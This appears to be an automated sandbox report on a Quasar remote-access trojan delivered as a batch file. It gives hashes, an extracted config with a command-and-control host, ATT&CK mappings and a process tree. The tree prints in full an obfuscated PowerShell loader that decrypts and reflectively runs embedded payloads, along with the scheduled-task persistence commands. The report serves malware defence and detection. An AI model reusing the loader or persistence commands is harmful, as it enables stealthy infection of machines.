quasar | 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

General

Target

Uni.bat
Size

1.8MB
MD5

14516087f9549022d5582272910428b1
SHA1

53324370839fa1c07bfa42cf7cb3039513805d42
SHA256

745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512

cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
SSDEEP

24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

SLAVE

C2

uk2.localto.net:39077

Mutex

cc0a2b76-665e-4e16-b318-5ee02270fbcd

Attributes

encryption_key
D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
install_name
UpdateHost.exe
log_directory
Error Logs
reconnect_delay
3000
startup_key
WOS64
subdirectory
Windows

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4960-54-0x00000257BB840000-0x00000257BBB64000-memory.dmp	family_quasar

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe
Executes dropped EXE 1 IoCs

Processes:

UpdateHost.exe

pid process

764 UpdateHost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3368 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
764	UpdateHost.exe

pid	process
3368	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exeUpdateHost.exe

pid	process
4780	powershell.exe
4780	powershell.exe
4496	powershell.exe
4496	powershell.exe
4960	powershell.exe
4960	powershell.exe
764	UpdateHost.exe
764	UpdateHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeIncreaseQuotaPrivilege	4496	powershell.exe
Token: SeSecurityPrivilege	4496	powershell.exe
Token: SeTakeOwnershipPrivilege	4496	powershell.exe
Token: SeLoadDriverPrivilege	4496	powershell.exe
Token: SeSystemProfilePrivilege	4496	powershell.exe
Token: SeSystemtimePrivilege	4496	powershell.exe
Token: SeProfSingleProcessPrivilege	4496	powershell.exe
Token: SeIncBasePriorityPrivilege	4496	powershell.exe
Token: SeCreatePagefilePrivilege	4496	powershell.exe
Token: SeBackupPrivilege	4496	powershell.exe
Token: SeRestorePrivilege	4496	powershell.exe
Token: SeShutdownPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeSystemEnvironmentPrivilege	4496	powershell.exe
Token: SeRemoteShutdownPrivilege	4496	powershell.exe
Token: SeUndockPrivilege	4496	powershell.exe
Token: SeManageVolumePrivilege	4496	powershell.exe
Token: 33	4496	powershell.exe
Token: 34	4496	powershell.exe
Token: 35	4496	powershell.exe
Token: 36	4496	powershell.exe
Token: SeIncreaseQuotaPrivilege	4496	powershell.exe
Token: SeSecurityPrivilege	4496	powershell.exe
Token: SeTakeOwnershipPrivilege	4496	powershell.exe
Token: SeLoadDriverPrivilege	4496	powershell.exe
Token: SeSystemProfilePrivilege	4496	powershell.exe
Token: SeSystemtimePrivilege	4496	powershell.exe
Token: SeProfSingleProcessPrivilege	4496	powershell.exe
Token: SeIncBasePriorityPrivilege	4496	powershell.exe
Token: SeCreatePagefilePrivilege	4496	powershell.exe
Token: SeBackupPrivilege	4496	powershell.exe
Token: SeRestorePrivilege	4496	powershell.exe
Token: SeShutdownPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeSystemEnvironmentPrivilege	4496	powershell.exe
Token: SeRemoteShutdownPrivilege	4496	powershell.exe
Token: SeUndockPrivilege	4496	powershell.exe
Token: SeManageVolumePrivilege	4496	powershell.exe
Token: 33	4496	powershell.exe
Token: 34	4496	powershell.exe
Token: 35	4496	powershell.exe
Token: 36	4496	powershell.exe
Token: SeIncreaseQuotaPrivilege	4496	powershell.exe
Token: SeSecurityPrivilege	4496	powershell.exe
Token: SeTakeOwnershipPrivilege	4496	powershell.exe
Token: SeLoadDriverPrivilege	4496	powershell.exe
Token: SeSystemProfilePrivilege	4496	powershell.exe
Token: SeSystemtimePrivilege	4496	powershell.exe
Token: SeProfSingleProcessPrivilege	4496	powershell.exe
Token: SeIncBasePriorityPrivilege	4496	powershell.exe
Token: SeCreatePagefilePrivilege	4496	powershell.exe
Token: SeBackupPrivilege	4496	powershell.exe
Token: SeRestorePrivilege	4496	powershell.exe
Token: SeShutdownPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeSystemEnvironmentPrivilege	4496	powershell.exe
Token: SeRemoteShutdownPrivilege	4496	powershell.exe
Token: SeUndockPrivilege	4496	powershell.exe
Token: SeManageVolumePrivilege	4496	powershell.exe
Token: 33	4496	powershell.exe
Token: 34	4496	powershell.exe
Token: 35	4496	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2028 wrote to memory of 4780	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 4780	2028	cmd.exe	powershell.exe
PID 4780 wrote to memory of 4496	4780	powershell.exe	powershell.exe
PID 4780 wrote to memory of 4496	4780	powershell.exe	powershell.exe
PID 4780 wrote to memory of 2884	4780	powershell.exe	WScript.exe
PID 4780 wrote to memory of 2884	4780	powershell.exe	WScript.exe
PID 2884 wrote to memory of 2060	2884	WScript.exe	cmd.exe
PID 2884 wrote to memory of 2060	2884	WScript.exe	cmd.exe
PID 2060 wrote to memory of 4960	2060	cmd.exe	powershell.exe
PID 2060 wrote to memory of 4960	2060	cmd.exe	powershell.exe
PID 4960 wrote to memory of 3368	4960	powershell.exe	schtasks.exe
PID 4960 wrote to memory of 3368	4960	powershell.exe	schtasks.exe
PID 4960 wrote to memory of 764	4960	powershell.exe	UpdateHost.exe
PID 4960 wrote to memory of 764	4960	powershell.exe	UpdateHost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_539_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_539.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_539.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_539.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_539.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_539.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:3368

C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
"C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:764

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4d2c8d8bf93f9450f044c6ef5dff215a

SHA1
4d6ecc646ee6c124aaf7535c1387445e02734750

SHA256
e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0

SHA512
c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w0cqajya.fyu.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_539.bat
Filesize
1.8MB

MD5
14516087f9549022d5582272910428b1

SHA1
53324370839fa1c07bfa42cf7cb3039513805d42

SHA256
745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

SHA512
cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_539.vbs
Filesize
115B

MD5
335912c92f960bed6de5a2807d0c06e8

SHA1
0fc47a61e5ebaf37a0d9b147811b7fcf3f6bdfb5

SHA256
fff158e9c023a9497f4d3379766720928d815cdf3bf48ea947f51d9db3c8f6ea

SHA512
f0b7cf73a094d5765431e18ae71d5084d62aa392676342a3b197e98297f43c8ffa3a086406b568eda5cf3b4864fd192253602fc0baa9153599beb99252b657a6

Download Submit
memory/764-76-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/764-71-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmp

Filesize
64KB

Download
memory/764-70-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/764-72-0x0000020EA0390000-0x0000020EA03D4000-memory.dmp

Filesize
272KB

Download
memory/764-73-0x0000020EA06B0000-0x0000020EA0726000-memory.dmp

Filesize
472KB

Download
memory/764-77-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmp

Filesize
64KB

Download
memory/764-78-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmp

Filesize
64KB

Download
memory/4496-16-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/4496-27-0x000002257E830000-0x000002257E840000-memory.dmp

Filesize
64KB

Download
memory/4496-28-0x000002257E830000-0x000002257E840000-memory.dmp

Filesize
64KB

Download
memory/4496-31-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/4496-17-0x000002257E830000-0x000002257E840000-memory.dmp

Filesize
64KB

Download
memory/4780-12-0x000002AFEAD10000-0x000002AFEAD20000-memory.dmp

Filesize
64KB

Download
memory/4780-53-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/4780-14-0x000002AFED280000-0x000002AFED3D8000-memory.dmp

Filesize
1.3MB

Download
memory/4780-13-0x000002AFED040000-0x000002AFED048000-memory.dmp

Filesize
32KB

Download
memory/4780-11-0x000002AFEAD10000-0x000002AFEAD20000-memory.dmp

Filesize
64KB

Download
memory/4780-10-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/4780-5-0x000002AFED050000-0x000002AFED072000-memory.dmp

Filesize
136KB

Download
memory/4960-54-0x00000257BB840000-0x00000257BBB64000-memory.dmp

Filesize
3.1MB

Download
memory/4960-55-0x00000257B92C0000-0x00000257B92D0000-memory.dmp

Filesize
64KB

Download
memory/4960-51-0x00000257B92C0000-0x00000257B92D0000-memory.dmp

Filesize
64KB

Download
memory/4960-50-0x00000257B92C0000-0x00000257B92D0000-memory.dmp

Filesize
64KB

Download
memory/4960-46-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download
memory/4960-74-0x00007FF976AA0000-0x00007FF977561000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads